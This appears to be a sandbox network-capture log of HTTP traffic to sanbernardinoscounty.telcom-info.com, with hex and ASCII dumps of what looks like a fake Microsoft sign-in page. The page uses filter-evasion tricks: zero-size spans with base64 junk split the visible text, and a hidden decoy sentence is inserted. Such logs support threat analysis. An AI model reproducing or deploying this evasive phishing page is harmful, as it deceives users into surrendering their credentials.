                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:17 UTC640INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:16 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UEEdKDWjGpdV%2FZr7XZ%2BqUisGg765sMr%2FxlG7xKOybW8wCmRdEeZw6me1XvkQ4U%2FnuZhpsTqxahOQyJl1NZBHT9jSzVYB%2BBOP%2FM0gfzQSxr%2BQDot2a3ulhO4%2Bpqm5XdKxzaLZovOrxaNUXDzharBfeThRKeYc4vw%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff87c68af43e2-EWR
                                                                          2024-10-01 22:43:17 UTC729INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                                          Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 33 37 35 2e 31 76 32 2e
                                                                          Data Ascii: 431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38 35 2e 32 37 38 2c 31 33 2e 36 41 35 2e 33 35 38 2c 35 2e 33 35 38 2c
                                                                          Data Ascii: 539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,
                                                                          2024-10-01 22:43:17 UTC191INData Raw: 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                          Data Ascii: th="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                                                          2024-10-01 22:43:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.2.649802104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:16 UTC448OUTGET /home6dca65610bad709b07a9e6041699d6ce HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:17 UTC754INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:16 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQrnGZuIWk6kZPsgBfvMQjH2E3O6CuYRz1IuGRP6%2BlX5AE1seI2lP%2FZTM2GF9MzhhLlKPISuAorWWAyGmY0BCedwOTTIKlOdJLCKLRbUVAodgrb%2FyKL%2B7YWCMwzNOJH%2BDamMHEiO%2B3a3QbyQSsLAGimVmBvPUc4%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff87cb94242b1-EWR
                                                                          2024-10-01 22:43:17 UTC615INData Raw: 31 66 32 35 0d 0a 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 41 75 74 68 65 6e 74 69 63 61 74 69 6e 67 2e 2e 2e 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63
                                                                          Data Ascii: 1f25 <!DOCTYPE html><html dir="ltr" class="" lang="en"> <head> <title> Authenticating... </title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" c
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 32 73 76 67 2f 6d 64 4a 47 56 79 41 65 58 45 32 52 66 74 58 26 71 75 6f 74 3b 29 3b 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 20 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 26 71 75 6f 74 3b 32 73 76 67 2f 6d 64 4a 47 56 79 41 65 58 45 32 52 66 74 58 26 71
                                                                          Data Ascii: <div class="background " role="presentation"> <div style="background-image: url(2svg/mdJGVyAeXE2RftX&quot;);"></div> <div class="backgroundImage " style="background-image: url(&quot;2svg/mdJGVyAeXE2RftX&q
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 64 61 74 61 2d 76 69 65 77 69 64 3d 22 31 22 20 64 61 74 61 2d 73 68 6f 77 66 65 64 63 72 65 64 62 75 74 74 6f 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 74 69 74 6c 65 20 22 20 69 64 3d 22 6c 6f 67 69 6e 48 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: <div data-viewid="1" data-showfedcredbutton="true"> <div> <div class="row text-title " id="loginHeader">
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 2d 6d 64 2d 32 34 20 65 72 72 6f 72 20 65 78 74 2d 65 72 72 6f 72 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70
                                                                          Data Ascii: -md-24 error ext-error" id="usernameError"> E<span style="line-height: 0; font-size: 0px;">MA==</span>n<span style="line-height: 0; font-size: 0px;">MA==</span>t<span style="line-height: 0; font-size: 0p
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 61 6e 3e 64 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 65 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68
                                                                          Data Ascii: an>d<span style="line-height: 0; font-size: 0px;">MA==</span>r<span style="line-height: 0; font-size: 0px;">MA==</span>e<span style="line-height: 0; font-size: 0px;">MA==</span>s<span style="line-height: 0; font-size: 0px;">MA==</span>s<span style="line-h
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 6b 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 79 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70 61 6e 3e 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4d 41 3d 3d 3c 2f 73 70
                                                                          Data Ascii: nt-size: 0px;">MA==</span>S<span style="line-height: 0; font-size: 0px;">MA==</span>k<span style="line-height: 0; font-size: 0px;">MA==</span>y<span style="line-height: 0; font-size: 0px;">MA==</span>p<span style="line-height: 0; font-size: 0px;">MA==</sp
                                                                          2024-10-01 22:43:17 UTC521INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 22 20 68 69 64 64 65 6e 3e 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 20 64 65 62 61 74 65 73 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 61 6c 20 69 6d 70 61 63 74 3c 2f 73 70 61 6e 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 62 75 74 74 6f 6e 73 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                          Data Ascii: </div><span style="" hidden>Entertainment debates environmental impact</span> <div class="position-buttons "> <div clas
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 31 36 62 37 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 65 51 3d 3d 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 65 51 3d 3d 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 65 51 3d 3d 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79
                                                                          Data Ascii: 16b7 N<span style="line-height: 0; font-size: 0px;">eQ==</span>o<span style="line-height: 0; font-size: 0px;">eQ==</span> <span style="line-height: 0; font-size: 0px;">eQ==</span>a<span sty
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 22 20 6e 61 6d 65 3d 22 63 72 65 61 74 65 41 63 63 6f 75 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 61 51 3d 3d 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20
                                                                          Data Ascii: <a href="#" aria-label="" name="createAccount"> C<span style="line-height: 0; font-size: 0px;">aQ==</span>a<span style="line-height: 0;
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 70 78 3b 22 3e 61 51 3d 3d 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 61 51 3d 3d 3c 2f 73 70 61 6e 3e 75 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 61 51 3d 3d 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 61 51 3d 3d 3c 2f 73 70 61 6e 3e 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 61 51 3d 3d 3c 2f 73 70 61 6e 3e 3f 20 20 20 20 20 20
                                                                          Data Ascii: px;">aQ==</span>o<span style="line-height: 0; font-size: 0px;">aQ==</span>u<span style="line-height: 0; font-size: 0px;">aQ==</span>n<span style="line-height: 0; font-size: 0px;">aQ==</span>t<span style="line-height: 0; font-size: 0px;">aQ==</span>?


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.2.649809104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:18 UTC432OUTGET /2svg/ZLWhvXZy16NYSMW HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:18 UTC630INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:18 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8w7Q29rXn0oqa6k3qDfm99tj1vOrRMO5Tv3Zr%2FdzB0Jv1TQHuKk2RYgBIXBTfDqdkAvhZBEyj9sDpWoWwlbR9pai5Rym0TeFp4LCrYeTRi16tLXqu%2BjsWei9361NFftT8%2BYLrU9Zgm9mWK3meLJhtrQ0JBWBonc%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff887cc890f41-EWR
                                                                          2024-10-01 22:43:18 UTC739INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                          Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                                          2024-10-01 22:43:18 UTC1132INData Raw: 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 34 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 2f 72 61 64 69 61 6c
                                                                          Data Ascii: "/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radial
                                                                          2024-10-01 22:43:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          52192.168.2.649808104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:18 UTC461OUTGET /sig/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b0344ab6 HTTP/1.1
